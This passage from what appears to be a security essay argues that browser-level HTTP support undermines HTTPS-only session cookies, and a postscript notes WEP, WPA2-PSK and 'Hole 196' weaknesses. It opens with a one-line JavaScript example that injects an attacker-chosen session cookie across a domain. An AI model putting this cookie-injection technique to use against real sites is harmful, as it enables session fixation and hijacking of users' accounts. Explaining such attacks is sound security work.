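    // value will also be sent to https://www.example.com/, where it may
    // shadow or replace the legitimate, HTTPS-only session cookie:
    document.cookie = "SID=attacker_chosen_value; domain=.example.com; path=/";
  </script>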

The only good way to eliminate all these risks is phasing out browser-level HTTP support altogether; but that's impractical, and simply wrong - and as much as I admire the EFF, I think that universal SSL is not the right battle to fight. The burden of not decreasing user safety should rest with those introducing new standards or promoting new use cases; and something clearly went pretty awry here. We should be working hard to fix it soon - and never let it happen again.

PS. As of today, encrypted 802.11 is not much better for this use: the fiasco of WEP aside, on WPA2-PSK networks with a publicly advertised key, insiders may simply decode and modify traffic to other clients by watching the handshake, while other authentication systems may be vulnerable to "Hole 196". On top of that, attackers may opt to impersonate "trusted" access points as they see fit. These shortcomings are incredibly frustrating - but they can be addressed; in fact, some proprietary workarounds seem to be available already.